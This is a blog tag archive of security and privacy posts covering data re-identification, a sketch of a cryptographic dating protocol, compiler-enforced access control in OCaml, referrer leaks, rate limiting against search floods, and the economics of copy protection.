Tag Archive for 'Security'

No Personally Identifiable Information

With our hardware advances alone — computers can extract, store and analyze significantly greater amounts of data than a few years ago — it becomes easy for those who have data to actually use that data. And the software has improved, too.

There are many reasons to feel, if not unhappy, at least slightly uneasy about the direction our information society is taking.

Really? What could happen to me if my private information was used by people or organizations?

For one, many people value privacy on principle. I feel that it is my unalienable right to hide information from others as long as that information does not harm them, even if making that information public would not cause me any discomfort or trouble. Recently, Spotify started auto-publishing what users listened to directly on Facebook. Even if telling your friends what music you are listening to hardly qualifies as discomfort or trouble, the fact that Spotify and Facebook took the decision to share that information is outrageous. That is my decision, even if the subject is of minor importance in the grand scheme of things.

Grow a spine. Who cares if you listen to Nickelback? Are you an angsty teenager?

It’s not only about listening to Nickelback. There’s also the oppressed, the minorities, those in a position of weakness who would suffer greatly if their church group knew they were gay, if their employer knew they were looking for another job, if their government knew they were printing pamphlets, if their friends knew they voted for another party…

The Electronic Frontier Foundation has written again and again about the implications of privacy invasions. A simple cell phone that records your location information could cause a lot of trouble:

  • Did you go to an anti-war rally on Tuesday?
  • A small meeting to plan the rally the week before?
  • At the house of one “Bob Jackson”?
  • Did you walk into an abortion clinic?
  • Did you see an AIDS counselor?
  • Have you been checking into a motel at lunchtimes?
  • Why was your secretary with you?
  • Did you skip lunch to pitch a new invention to a VC? Which one?
  • Were you the person who anonymously tipped off safety regulators about the rusty machines?
  • Did you and your VP for sales meet with ACME Ltd on Monday?
  • Which church do you attend? Which mosque? Which gay bars?
  • Who is my ex-girlfriend going to dinner with?

Then don’t use a smartphone — don’t use tracking technology if you don’t want to be tracked.

Smartphones, I can do without, even though it seems these days most people cannot. But the internet? Not only does every site track what you do on that particular site, but there’s a growing tendency for some companies to track you across multiple unrelated sites — Google and Facebook are only the tip of the iceberg. We are still far from a solution for people to say « do not track me » let alone actually enforcing that solution.

Credit and debit cards follow the same principles: your bank or credit card company knows where you are buying from, and how much you are spending. Your phone company knows who you call, when, and for how long. And government agencies keep a lot of information about many things you do.

In isolation, all of that information is not very useful, but once the owners of these files start sharing them, they become a lot more distressing for us.

Distressing? Why?

Below the surface lies our old human habit of appearing to others as we wish to appear, which for most of us involves hiding some elements and sometimes lying about others. We are weak, boring, average, struggling and unhappy, but we wish to appear strong, interesting, exceptional, successful and happy; and there are few, if any, whom we trust to see our real selves. Maybe the world would be a better place if everyone was fully honest with others (no secrets, no lies, just sincere honesty), but that is not how we are, and uncontrolled publication of information about ourselves will make many of us unhappy.

But those are faceless corporations sifting through my data with automated tools. Even if they could judge me, I wouldn’t care.

You need health insurance, but the insurance tells you that since you buy medicine far more often than the average citizen — it’s right there on your credit card transaction history — there must be something wrong with your health, so you will need to pay more. And you spend a few hours explaining that the medicine was for an ailing family member, not yourself.

A prospective employer determines that because you did or said something silly back in college, you should not be hired, but never explains why you were rejected.

You are divorcing, and your spouse’s lawyer digs up some innocent information from your cell phone or internet history which, out of context, makes you look extremely bad.

Even faceless organizations can judge you based on information. In fact, they would rather collect and buy as much information as possible about you, because they assume that you would lie about it.

Wait, wait, wait. You’re assuming that my insurance company could find out about my credit card history.

Yes, I am assuming that, and I know it sounds like paranoia. But there are evil people out there who see those huge databases full of tasty personal information and will try to get their hands on them. This has already happened.

Hackers regularly attack web sites and extract personal information from their databases.

It started as a security breach on the PlayStation network and other Sony services that exposed the personal information of 100 million users. From there, it has mushroomed into broader, ongoing security troubles across the Sony empire that have spilled out into the wider world.

Lawyers have used the courts’ power to subpoena ISPs for personal information of potential offenders, without the courts’ consent.

To summarize the staggering chutzpah involved in this case: Stone asked the Court to authorize sending subpoenas to the ISPs. The Court said “not yet.” Stone sent the subpoenas anyway.

Recently, the German government used trojans to extract communication information present on computers.

[...] the German-based Chaos Computer Club announced it had examined a Trojan horse program allegedly spread by government officials to secretly spy on citizens’ Internet travels, e-mail, chat and more. The software, originally intended only to help officials intercept Internet phone calls through legal wiretaps, went far beyond those permissible purposes, the hacker group alleged.

Individuals, corporations, governments, everyone has done it and will probably do it again at some point. Just because something is illegal or forbidden does not mean it will not happen. Nor does it mean that laws cannot be later adapted or extended to allow previously forbidden behavior.

I do not trust groups of humans to act in a responsible and independent manner. If the underlying principles of a technology make invasions of privacy impossible or very difficult, I will feel safe and secure. If the only guarantee is a promise, however strong or binding it may appear, then I might as well assume that there is no privacy.

What if they guarantee that there is no personally identifiable information collected ?

That is usually a promise: an intentional anonymization process that could be removed at a later point. But even assuming that they are honest and will remain forever honest, « personally identifiable » is hardly a concrete property of information. If you are the only person in your ZIP code born on a specific day, then ZIP code + birth date is personally identifiable information about you. And indeed, 87% of the US population can be identified using only their ZIP code, birth date and gender.

Your Facebook browsing history never mentions your identity, but I can guess who you are based on which Facebook profile you visit the most (yours) using a simple frequency analysis algorithm.
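The frequency analysis mentioned above fits in a few lines of OCaml. This is only a sketch: the visit history is made-up data and `most_visited` is a hypothetical helper, but it shows that counting profile visits is enough to produce a good guess.

```ocaml
(* Count how many times each profile appears in a browsing history and
   return the most visited one. The history carries no explicit identity. *)
let most_visited (history : string list) : string option =
  let counts = Hashtbl.create 16 in
  List.iter
    (fun profile ->
      let n = Option.value (Hashtbl.find_opt counts profile) ~default:0 in
      Hashtbl.replace counts profile (n + 1))
    history;
  Hashtbl.fold
    (fun profile n best ->
      match best with
      | Some (_, best_n) when best_n >= n -> best
      | _ -> Some (profile, n))
    counts None
  |> Option.map fst

(* Made-up history: the profile names are placeholders. *)
let history = [ "alice"; "bob"; "alice"; "carol"; "alice"; "bob" ]

let guess = most_visited history
```

With this history, `guess` points at the profile that shows up most often, which is very likely the owner of the browser.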

The only way to make sure that no personally identifiable data is stored is to make sure that it is deleted.

Article Image © Andrea Roberts — Flickr

A Decentralized Dating Protocol

I’ve been wondering about how a decentralized dating protocol could be implemented.

Here’s the idea : Alice would love to date Bob, and Bob would also love to date Alice, but both of them are too shy to actually ask the other out. The good news is, Alice and Bob are the protagonists of almost every single cryptography protocol out there, and they naturally have asymmetric encryption keys. So, they resort to using the MAP (Mutual Attraction Protocol) to reveal whether they are interested in each other, but only if the feeling is indeed mutual.

An elementary implementation of the protocol could behave as such:

  1. Bob wishes to tell Alice about his feelings. He concatenates a fixed ILOVEYOU prefix and a random suffix RAND, encrypts the result with Alice’s public key APub, then with his private key BPriv. This creates the cipher BPriv(APub(ILOVEYOU || RAND)).
  2. He then publishes the cipher to a public location where anyone looking for it can easily find it, such as a database indexed by the public key of the uploader.
  3. Alice wishes to know whether Bob has feelings for her. She scours the public databases for any items matching Bob’s public key, and stumbles upon the aforementioned BPriv(APub(ILOVEYOU || RAND)) cipher.
  4. She then decrypts it with Bob’s public key, and uses her own private key to decrypt the result. She ends up with ILOVEYOU || RAND and determines, based on the presence of the initial ILOVEYOU, that there’s indeed a love interest around.

The protocol is of course symmetrical: when you wish to express your interest, you should both publish it to the public database and look through that database for a reciprocal interest.
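The four steps above can be sketched as a symbolic model in OCaml. There is no real cryptography here: encryption is a constructor that can only be opened with the matching half of a key pair. Every name (`person`, `Enc`, `declare`, `reads_interest`, the `Carol` bystander, the `"4f9a"` suffix) is an assumption made for this illustration.

```ocaml
(* Symbolic model: no real cryptography, only the rules of who can open what. *)
type person = Alice | Bob | Carol

type key = Pub of person | Priv of person

type message =
  | Plain of string
  | Enc of key * message  (* a message encrypted under a key *)

(* A layer encrypted with one half of a key pair opens with the other half. *)
let decrypt key message =
  match key, message with
  | Pub p, Enc (Priv q, inner) when p = q -> Some inner
  | Priv p, Enc (Pub q, inner) when p = q -> Some inner
  | _ -> None

let prefix = "ILOVEYOU"

(* Steps 1 and 2: build SenderPriv(TargetPub(ILOVEYOU || RAND)). *)
let declare ~sender ~target ~rand =
  Enc (Priv sender, Enc (Pub target, Plain (prefix ^ rand)))

(* Steps 3 and 4: strip the sender's layer, then the reader's own layer,
   and look for the fixed prefix. *)
let reads_interest ~reader ~sender cipher =
  match decrypt (Pub sender) cipher with
  | None -> false
  | Some inner ->
    (match decrypt (Priv reader) inner with
     | Some (Plain text) ->
       String.length text >= String.length prefix
       && String.sub text 0 (String.length prefix) = prefix
     | _ -> false)

let bobs_entry = declare ~sender:Bob ~target:Alice ~rand:"4f9a"

let alice_sees_it = reads_interest ~reader:Alice ~sender:Bob bobs_entry

let carol_learns_nothing =
  not (reads_interest ~reader:Carol ~sender:Bob bobs_entry)
```

In this model Alice recovers the prefix, while Carol can remove Bob's outer layer but gets stuck on the inner one.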

This version of MAP has the following interesting properties:

  • Only Bob can publish Bob’s feelings on the public database, because doing so requires encrypting them with Bob’s private key.
  • Only Alice can determine whether a given entry on the public database is about her, because doing so involves her own private key.

However, it assumes that Alice will only search for Bob’s message if she is herself interested in him. This is not necessarily true : Alice might be running some software that automatically searches through the public database for people who like her. This clearly violates the constraint that the feelings should only be revealed if they are indeed mutual — that, before Alice can determine whether Bob posted an “I’d date Alice” message, she must post an “I’d date Bob” message herself for Bob to read.

The question I am stuck on is, can these constraints be implemented without involving a trusted third party ?

Article image © Nattu — Flickr

Compiler-Enforced Access Control System

My apologies to my non-technical readers: this article is going to be a hairy, brain-roasting piece of technical innovation. The same goes for my technical readers not familiar with Hindley-Milner.

The Problem

An access control system is a piece of software architecture that makes sure only authorized users can access certain parts of the software. Access restrictions are usually defined as rules in a variety of formats. The most basic ones apply to general user categories and features: for instance, only a moderator (user category) can ban another user (feature). Rules can get extremely complex. For your amusement, here’s a real-life example:

The event page may be edited by the creator of that event page, by the moderator of any of the groups in which that event was posted, or by any global administrator account, as long as the editing user has entered their password at least once since they entered the website.

As a software architect mindful of the safety of your data, you have a few basic requirements for any access control system:

  • Exhaustivity: no access should remain unchecked. It’s usually easy to determine through code reviews if a developer forgot to write the access-checking code for a feature. But if that code is even slightly off, you have a potential disaster on your hands. This is usually solved by applying obscene amounts of testing, both automated and human, to check if all unauthorized accesses are denied by the system correctly.
  • Predictability: one should be able to tell if an operation is possible without actually trying it. This is useful for hiding unavailable buttons, displaying error messages in advance, or simply acting in a transactional manner when rollback is not available. This is usually solved by factoring out the code that does the access-checking, and calling it both from the actual operation, and from any code that is about to run the operation and wonders if it can be done.
  • Readability: since documentation inevitably goes out of sync, the code should be readable enough by itself to determine what the access rules are. A 50-line sequence of API calls, database queries and well-named variables will require some reverse engineering, no matter how well-named the variables are.

This is pretty hard to achieve, mostly because every single project out there contains code like the one below:

User.checkRecipientList(Request.recipients, Request.user);

foreach (var recipient in Request.recipients)
{
    var email = new Email();

    email.From = Request.user;
    email.To   = recipient;
    email.attach(file);
    email.send();
}

The main danger, of course, is that the Email class was not written to check that the sender can indeed send a message with an attachment to the recipient. This can be solved through code reviews, which scan all classes in search of missing access control code, and through functional tests, because the specs said an error message should appear. These are costly, tedious solutions, but they do eliminate that problem. However, even assuming that the class was indeed written correctly, other problems remain:

  • The sending either fails silently (no user error message: bad user interface design!) or throws an exception which results in a partial sending (you can’t cancel email once it is sent).
  • The compiler has no reason to complain or warn the developer about anything.
  • The developer wrote this code at 7 p.m. and had something else to do on the next morning.
  • The code reviewer and unit tester didn’t know there was a special rule about sending attachments, and expect User.checkRecipientList to throw an error if a recipient is invalid.
  • The code coverage tool is perfectly fine with this.
  • The specs merely said «an error appears if a recipient is invalid»

In short, this piece of code contains a time bomb that no user or software can detect until it goes off.

The Tools

Before I explain what I’ll be doing, I need to describe the tools I’m going to use. As you might have guessed from the Hindley-Milner reference above, I’ll be using a variant of ML, namely Objective Caml. The language provides a sophisticated type system, entirely checked at compile-time, and which can be almost completely inferred from the code (that is, you almost never have to add type annotations to your programs). For instance :

open Printf

let print_integer x =
  printf "The integer is %d" x

(* Deliberate type error: a string is passed where an int is expected. *)
let () = print_integer "hello"

This code defines a function called print_integer that accepts a single argument, and uses the classic printf function to print it. It then tries to call that function with a string argument. The Objective Caml type inference algorithm will look at the format, which contains a single %d, and deduce that it expects a single integer argument. From there, it deduces that the first argument to print_integer should be an integer, and that the function returns nothing, which gives it the type int -> unit. As a consequence, passing a string is a type error :

This expression has type string but an expression was expected of type int

A highly expressive compile-time type system means we can use it to prove important properties about our software, but it increases the size of type expressions (because types have to carry more information). Type inference means we won’t have to write those long type expressions everywhere.

Objective Caml types are parametric, which works a bit like generics in C# and Java. The type system automatically infers the type parameters from the code :

let first_element array =
  array.(0)

In this example, the type of the function would be correctly identified as 'a array -> 'a : it accepts an argument which is an array of a generic type 'a, and returns an element of that same type 'a. There are plenty of parametric types in the standard library alone : 'a array, 'a list, 'a option.

The latter is the Objective Caml replacement for null values : the language does not allow values to be null (when you say a variable is an array, then it’s always a valid array), so values that might be missing are explicitly tagged as optional using the option type. For instance, when you’re looking for an item in a database, you might want to return an optional type to represent the situation where the item is missing. While exceptions would interrupt the control flow and rise up to the nearest try-catch block that can handle them, using options forces the developer to decide on the spot what he wants to do with the value, usually with pattern matching:

match Database.read id with
  | Some item -> frobnicate item
  | None      -> frobnicate default_item

Options have the advantage that you can’t forget to handle the null case, because you have to use pattern matching to access the returned value. On the contrary, you can always forget that an exception might be thrown (and it’s not obvious when doing a code review, either).
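Here is a self-contained version of that pattern, as a sketch. The `database` table, `read`, `default_item` and `describe` are stand-ins invented for this example; only `Hashtbl.find_opt` and the `option` type come from the standard library.

```ocaml
(* Hypothetical in-memory "database": a table from ids to items. *)
let database : (int, string) Hashtbl.t = Hashtbl.create 16

let () = Hashtbl.replace database 1 "first item"

(* Returns an option instead of raising when the id is unknown. *)
let read id = Hashtbl.find_opt database id

let default_item = "default item"

(* The caller has to go through both cases to get at the value. *)
let describe id =
  match read id with
  | Some item -> "found: " ^ item
  | None -> "missing, using: " ^ default_item

let found = describe 1

let missing = describe 2
```

If the `None` branch is left out, the compiler warns that the pattern matching is not exhaustive, which is exactly the reminder an exception would not give.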

The Solution

Another important element of the Objective Caml type system is the ability of modules to hide away type information. Consider the following example :

type 'a page = { password : string ; id : int }

let read page =
  Database.read page.id

let write page content =
  Database.write page.id content

let unlock page password =
  if password = page.password then Some page else None

let lock page =
  page

This is an elementary access control system : you can read both locked and unlocked pages, but once you lock a page, you need to unlock it with a password before you can write to it again. Looking at the code above, this doesn’t appear at all : there’s no locked/unlocked boolean variable on the page, which means I could pass a locked page to the write function and it would not complain about it at all! The lock function merely returns its argument without doing anything to it! The only password-related code is the unlock function, which does indeed check the password, but there’s no need to unlock a page before it’s written to…

The unnecessary type parameter on the page type should have been a hint, and it all becomes clear when one looks at the module signature :

type 'a page

val read   : 'a page -> string
val write  : [`Unlocked] page -> string -> unit
val unlock : [`Locked]   page -> string -> [`Unlocked] page option
val lock   : [`Unlocked] page -> [`Locked] page

This module signature describes how every other module in the system will see our page-related functions. It hides the definition of the page type, to prevent people from accessing its fields directly, uses the seemingly unnecessary type parameter to carry additional information about the locked/unlocked state of the page, and it restricts the type of the write function to only accept pages which are unlocked. All of this is allowed : as long as the signature defines a type that’s more restrictive than the actual type inside the module, it’s still going to work.

So, from inside the module, the page is fully accessible regardless of its locked/unlocked status, but outside the module, the locked/unlocked status is enforced at compile time by the type system. This is very important : if you try to write to the page without asking for a password first, you don’t get a runtime exception, you get a compiler error message. And a pretty clean one, too:

This expression has type [`Locked] page but an expression was expected of type [`Unlocked] page

Also, since the definition of the page type is hidden away by the module signature, the only way to create an unlocked page is with the unlock function above.
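For readers who want to try this, here is a compilable sketch that puts the implementation and the signature together. A few things are assumptions of mine: the `Page` module name, the `create` constructor, and an in-memory table standing in for the Database module. Also note that in this sketch `lock` and `unlock` rebuild the record through a small `retag` helper, because with a record type, returning the very same value would keep its original type parameter.

```ocaml
module Page : sig
  type 'a page

  val create : id:int -> password:string -> [ `Locked ] page
  val read   : 'a page -> string
  val write  : [ `Unlocked ] page -> string -> unit
  val unlock : [ `Locked ] page -> string -> [ `Unlocked ] page option
  val lock   : [ `Unlocked ] page -> [ `Locked ] page
end = struct
  type 'a page = { password : string; id : int }

  (* Stand-in for the Database module: page contents indexed by id. *)
  let contents : (int, string) Hashtbl.t = Hashtbl.create 16

  let create ~id ~password = { password; id }

  let read page = Option.value (Hashtbl.find_opt contents page.id) ~default:""

  let write page content = Hashtbl.replace contents page.id content

  (* Rebuilding the record lets the result carry a different tag. *)
  let retag page = { password = page.password; id = page.id }

  let unlock page password =
    if password = page.password then Some (retag page) else None

  let lock page = retag page
end

let page = Page.create ~id:1 ~password:"hunter2"

let wrote =
  match Page.unlock page "hunter2" with
  | Some unlocked -> Page.write unlocked "hello"; true
  | None -> false

(* Page.write page "oops" would be rejected by the compiler here:
   page is a [ `Locked ] Page.page, not a [ `Unlocked ] Page.page. *)
let content = Page.read page
```

Outside the module, the only way to obtain an unlocked page is to call `Page.unlock` with the right password.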

As for performance, once the software is compiled, all of this vanishes into nothingness : Objective Caml only uses type information for checking the validity of the program, and discards it from the final binary.

All of it using only standard language features. Can your language do that? ;)

This approach revolves around proving that you have access to a certain feature of a certain object. That proof is created by a first function (the provider), placed in the type parameter of the object, and required by a second function (the consumer) that actually performs the intended operation. In the example above:

  • The unlock function is a provider : it proves that the user knows the password by placing [`Unlocked] in the type parameter of the page.
  • The write function is a consumer : it expects the page to be [`Unlocked] before it writes data to it.

In short, you have providers that perform the access control tests (is this user authenticated? is he an administrator? does he know the password?) and then securely store the result of those tests to be used by the features they are protecting. The type system prevents the users from using features without successfully calling the providers first, and the module system lets you write providers and consumers without having to define brand new types all the time.

The security comes from the fact that if the consumer expects a certain proof (as an argument of specified type) then that argument was necessarily returned by one of the providers able to create that proof. Tight control of proof providers (made possible by the fact that providers are always in the same module as the one that defines the type that carries the proof) combined with responsible and conservative definition of consumers helps keep a system safe and secure.

A Few Examples

In practice, the proof that is being carried around takes many shapes, the two main ones being about proving who the user is, and proving what the user can do. The provider of who-proofs is the authentication system, which digs up information about the user from the cookie, the session and the database, and draws a conclusion about who that user is:

type 'a user

val current_user : [`Unknown] user
val as_admin     : 'a user -> [`Admin] user option

It’s fairly common to transform who-proofs into what-proofs based on generic rules such as “an administrator can edit everything”:

type 'a page

val edit_by_author : 'a page -> 'b user -> [`Editable] page option
val edit_by_admin  : 'a page -> [`Admin] user -> [`Editable] page
val edit           : [`Editable] page -> string -> unit

This illustrates the difference between absolute rules and conditional rules : “an administrator can edit everything” is an absolute rule, because it’s always true, whereas “the author can edit his creation” is a conditional rule because the user might not be the author of the page. This is outlined in the example above by the fact that one function returns an option (indicating the possibility of failure) while the other does not.

The edit-by-author property could also be handled by representing ownership as a proof on the page :

val is_author      : 'a page -> 'b user -> [`Owned] page option
val edit_by_author : [`Owned] page -> [`Editable] page

As an example, the above can be used to construct a generic “editable” function that accepts any page and user as an argument, and proves whether the page can be edited by the user :

let editable page user =
    match as_admin user with
    | Some admin -> Some (edit_by_admin page admin)
    | None -> match is_author page user with
              | Some owned -> Some (edit_by_author owned)
              | None -> None

val editable : 'a page -> 'b user -> [`Editable] page option
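To see the who-proofs and what-proofs work together, here is a self-contained sketch. The signatures of `as_admin`, `is_author`, `edit_by_admin`, `edit_by_author` and `edit` follow the ones above; everything else (the `Access` module, `login`, `new_page`, `contents`, the record fields and the `Unknown tag on fresh pages) is invented so that the example can run.

```ocaml
module Access : sig
  type 'a user
  type 'a page

  (* Hypothetical constructors, not part of the signatures in the post. *)
  val login    : name:string -> admin:bool -> [ `Unknown ] user
  val new_page : author:string -> [ `Unknown ] page
  val contents : 'a page -> string

  val as_admin       : 'a user -> [ `Admin ] user option
  val is_author      : 'a page -> 'b user -> [ `Owned ] page option
  val edit_by_admin  : 'a page -> [ `Admin ] user -> [ `Editable ] page
  val edit_by_author : [ `Owned ] page -> [ `Editable ] page
  val edit           : [ `Editable ] page -> string -> unit
end = struct
  type 'a user = { name : string; admin : bool }
  type 'a page = { author : string; body : string ref }

  let login ~name ~admin = { name; admin }
  let new_page ~author = { author; body = ref "" }
  let contents page = !(page.body)

  (* Rebuilding the record changes the tag; the body reference is shared. *)
  let retag page = { author = page.author; body = page.body }

  let as_admin user =
    if user.admin then Some { name = user.name; admin = true } else None

  let is_author page user =
    if page.author = user.name then Some (retag page) else None

  let edit_by_admin page _admin = retag page
  let edit_by_author page = retag page
  let edit page content = page.body := content
end

let editable page user =
  match Access.as_admin user with
  | Some admin -> Some (Access.edit_by_admin page admin)
  | None ->
    (match Access.is_author page user with
     | Some owned -> Some (Access.edit_by_author owned)
     | None -> None)

let page = Access.new_page ~author:"alice"
let alice = Access.login ~name:"alice" ~admin:false
let mallory = Access.login ~name:"mallory" ~admin:false
let root = Access.login ~name:"root" ~admin:true

(* Returns true when the edit was allowed and performed. *)
let try_edit user text =
  match editable page user with
  | Some editable_page -> Access.edit editable_page text; true
  | None -> false
```

The author and the administrator both get through `editable`; anyone else receives `None` and never holds a value that `Access.edit` would accept.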

Another example would be giving another user a token that they can use to edit a page, but do nothing else :

let prove_editable page =
  hash (secret_key, page.id, "editable")

val prove_editable : [`Editable] page -> string

let check_proof_editable proof page =
  if proof = hash (secret_key, page.id, "editable") then Some page else None

val check_proof_editable : string -> 'a page -> [`Editable] page option

This effectively lets you serialize a proof to a string, and later unserialize it to allow edit access to a user that normally couldn’t have edited the page.
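A runnable sketch of this serialization follows. The `hash` function above is left unspecified in the post, so this example substitutes the standard library's `Digest` module (MD5) purely for illustration; a real system would more likely use a keyed MAC such as HMAC from a cryptography library. The `Page` module, `of_id`, `trusted_grant` and the secret value are all hypothetical.

```ocaml
module Page : sig
  type 'a page

  val of_id : int -> [ `Unknown ] page

  (* Stand-in for the real providers (edit_by_admin, edit_by_author). *)
  val trusted_grant : 'a page -> [ `Editable ] page

  val prove_editable       : [ `Editable ] page -> string
  val check_proof_editable : string -> 'a page -> [ `Editable ] page option
end = struct
  type 'a page = { id : int }

  (* Placeholder secret: it must never leave the server. *)
  let secret_key = "not-a-real-secret"

  let of_id id = { id }

  let trusted_grant page = { id = page.id }

  (* Digest is MD5, used here only because it ships with OCaml. *)
  let token page =
    Digest.to_hex
      (Digest.string (secret_key ^ ":" ^ string_of_int page.id ^ ":editable"))

  let prove_editable page = token page

  let check_proof_editable proof page =
    if proof = token page then Some { id = page.id } else None
end

let page = Page.of_id 42
let other = Page.of_id 43

(* Serialize the proof for page 42, then try it on both pages. *)
let token = Page.prove_editable (Page.trusted_grant page)

let accepted = Page.check_proof_editable token page <> None

let rejected = Page.check_proof_editable token other = None
```

The token only unlocks the page it was issued for, and only `prove_editable`, which requires an editable page, can issue one.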

Brain Dump

HTML 5 Advertising. Many ads these days come as Adobe Flash-based video. Given that Apple still has no plans to provide Flash support on their iPhone or iPad, surely they would look for an alternative solution? It looks like they have: their recently announced mobile advertisement platform, iAd, will provide video ads using HTML 5.

The Mind as a Security Vulnerability. The core of every security flaw is a user mistakenly allowing someone to do something unintended. Our inability to know everything or check everything is fundamental here. For instance, we check whether a site we visit is who it pretends to be on the first visit, but not when we leave the tab and come back to it again. Phishing (and conning) is an interesting form of psychology research : looking for unconscious assumptions about the world.

The blogger’s approach to Privacy. I blog under my real name. So, don’t expect to find on this blog tales of my decadent nights of heavy drinking (assuming for a moment that such nights did exist). I apply the same restraint to all my activities online : whenever I am about to post something anywhere on the internet, I ask myself whether I would post it on my own blog, so I know I don’t have to be afraid of the weekly Facebook privacy policy changes.

The ban on laptops. In an ideal world, only one laptop is allowed in every meeting, and only if there must be some computer-based presentation involving that laptop. If you have trouble pushing a laptop ban agenda, remember that Bhutan did it back in 2008. If a government does it, why shouldn’t you?

Easier Turing Test. The Turing test determines whether an artificial intelligence is sneaky enough to pass for a human in a long text-only conversation with an actual human. These days, many data sources aim for quantity instead of quality. How easy is it to have a computer program pretend to be a reputable source of news? SnarXiv already does this for scientific papers, and is nearly indistinguishable from actual arXiv listings.

Referrers, Webmails and Competition

When you visit a web site, that web site remembers your request, along with some information about that request. Here’s some data that the Apache web server remembers:

  • 217.111.148.194 : your IP address
  • [26/Apr/2010:13:02:15 +0200] : when you visited
  • GET /ladies/naughty.avi : what you asked for.
  • https://www.facebook.com : the page where you found the link to the current page
  • Mozilla/5.0 : your browser
  • Windows NT 6.0 : your operating system

It is of course possible to eliminate most of that information (only the first three are required). It is the fourth, however, that can cause havoc: people know where you come from.
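To make this concrete, here is a sketch of how a server-side script could pull the referrer out of one log entry. It assumes Apache's "combined" log format; the sample line reuses the values listed above, while the HTTP version, status code and response size are made up, and `referrer_of` and `ip_of` are hypothetical helpers.

```ocaml
(* Hypothetical entry in Apache's "combined" log format. The HTTP version,
   status (200) and size (1234) are invented for the example. *)
let line =
  "217.111.148.194 - - [26/Apr/2010:13:02:15 +0200] \
   \"GET /ladies/naughty.avi HTTP/1.1\" 200 1234 \
   \"https://www.facebook.com\" \"Mozilla/5.0 (Windows NT 6.0)\""

(* Splitting on double quotes isolates the quoted fields:
   request, then referrer, then user agent. *)
let referrer_of line =
  match String.split_on_char '"' line with
  | _before :: _request :: _status_and_size :: referrer :: _ -> Some referrer
  | _ -> None

(* The client address is everything up to the first space. *)
let ip_of line =
  match String.index_opt line ' ' with
  | Some i -> Some (String.sub line 0 i)
  | None -> None

let referrer = referrer_of line

let ip = ip_of line
```

A few lines of code are enough for the site owner to pair every visitor's address with the page that sent them.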

Consider now what would happen if your corporation uses some kind of webmail. Something like http://mail.google.com/a/myCompany or http://intranet.myCompany.com/zimbra. Suppose that one of your co-workers sends you an e-mail about a new feature from your competitor that you absolutely have to see. In that e-mail is a link. You click on the link.

Since the e-mail was displayed as a web page in your web browser, its address will be sent to your competitor’s server. Now your competitor knows that your company is exchanging mails about their latest feature.

Some web mailers protect you against this. Check it out.

Gradual Response

When designing an online server, some high-overhead operations (such as search) tend to decrease performance a lot.

One possibility is to ignore the issue. After all, you can only optimize search so much, and you only have so much money to go around for installing slave databases and extending web farms. The vast majority of small websites developed on a tight budget will tend to use this approach.

This opens the website to denial of service (DoS) attacks where an attacker can hit the server by sending large amounts of requests that take a lot of time to process. Imagine your one-database, one-server web site being hit by a hundred search requests per second—unless you have no content, the search operation will clog the tubes for every other visitor.

The solution is, of course, to limit repeat requests. No legitimate human user will submit ten search queries in ten seconds, so you may choose to detect such requests and prevent them from being executed. This can be done using the session data (very fast) if it’s available, and by persisting IP and timestamp data to the database for session-less visitors.

This creates a different issue: if you trigger the defense mechanism too easily, you can frustrate normal users. But making the trigger less sensitive is harder, because it cannot use the simple “if last request happened less than X seconds ago” approach. Case in point: go to www.magentocommerce.com and use the search box:

  • Enter a first search query, with a small typo.
  • Quickly correct the typo and re-submit the query.

If you did that in less than fifteen seconds (as most programmers certainly can) you will end up with a denial page.

A gradual response is always a good idea. If you get two queries in a row, it can still be a legitimate user. It might be a good idea to choose a higher value of N in the “allow only N requests in T seconds” rule, so that it takes N requests within the window to trigger the defense.
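The “allow only N requests in T seconds” rule can be sketched as a pure function over a visitor's request history. This is a minimal illustration, not a production limiter: `recent`, `allow`, the timestamps and the values N = 3 and T = 15 are all assumptions, and the history would live in the session or the database as described earlier.

```ocaml
(* Keep only the timestamps that fall within the last [window] seconds. *)
let recent ~window ~now timestamps =
  List.filter (fun t -> now -. t < window) timestamps

(* "Allow only N requests in T seconds": returns the decision and the
   updated history for this visitor. Refused requests are not recorded. *)
let allow ~max_requests ~window ~now history =
  let kept = recent ~window ~now history in
  if List.length kept < max_requests then (true, now :: kept)
  else (false, kept)

(* Simulate one visitor sending requests at the given times (in seconds). *)
let decisions =
  let step (history, acc) now =
    let ok, history = allow ~max_requests:3 ~window:15.0 ~now history in
    (history, ok :: acc)
  in
  let _, acc = List.fold_left step ([], []) [ 0.0; 2.0; 4.0; 6.0; 20.0 ] in
  List.rev acc
```

With these numbers, the first three requests go through, the fourth (still inside the 15-second window) is refused, and the request at 20 seconds is accepted again because the earlier ones have expired. A quick typo correction never trips the limit.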

Another way is to delay the requests instead of simply refusing them: the second request within 15 seconds redirects to a “waiting page” for 15 seconds before resolving. This also helps legitimate users see when the query will be available again, so that they do not search one second too early and reset the 15-second timer.
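One possible way to compute the delay shown on the waiting page is sketched below. It is a variation on the idea above: instead of a fixed 15 seconds, it makes the visitor wait only for the remainder of the cooldown. The `wait_time` function and its parameters are hypothetical.

```ocaml
(* Seconds a request must wait before it may run: zero if there was no
   previous request or it is old enough, otherwise the remainder of the
   cooldown. *)
let wait_time ~cooldown ~last_request ~now =
  match last_request with
  | None -> 0.0
  | Some last -> Float.max 0.0 (cooldown -. (now -. last))

(* A second search 4 seconds after the first, with a 15-second cooldown. *)
let delay = wait_time ~cooldown:15.0 ~last_request:(Some 100.0) ~now:104.0
```

The server would record the time at which the delayed query actually runs as the new last request, so that waiting never resets the timer in the visitor's disfavor.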

Copy Protection

You’re a software developer, and you’ve just developed a new piece of software that you now want to sell. But there’s the problem: your customers are greedy schemers out to get you. You’ll get one paid download from them, and then they’ll make the software available online for free and you won’t get another cent from it ever.

Never mind, you say, I can always include copy protection in my software!

Arr! Here be bytes and checksums!

No protection is cracker-proof

Any software that runs on the user’s computer is vulnerable. What you have just given your customer is a complete description of how the program works, and any dedicated cracker can alter that description so that the copy protection behavior is disabled. No amount of skill or cleverness is going to save you here: you cannot stop the cracking process, you may only slow it down.

In fact, the objective of the copy protection of most games is just that: to slow down the crackers long enough for the game to make a profit (since most of a game’s sales occur right after its release).

So, you will be looking for the optimal amount of copy protection to include in your game: too much, and you will be spending more money than you’ll ever earn; too little, and hundreds of people will be seeding a torrent for your program within one day.

No protection is harmless

The problem with copy-protection is that it needs to determine whether the program is being used in a legitimate way. This is extremely hard to do correctly (even if you ignore the issue of crackers for a moment), because the very definition of legitimate use is complex.

See, a user can use a program if they bought it from the developer. The problem is that your average computer has no biological identification features that could be used to identify the user, so you must rely on other ways of gathering that information such as:

  • Requiring that the user insert the original CD, connect a USB dongle or enter a key.
  • Using an internet connection for verification.
  • Locking the software to a single machine.

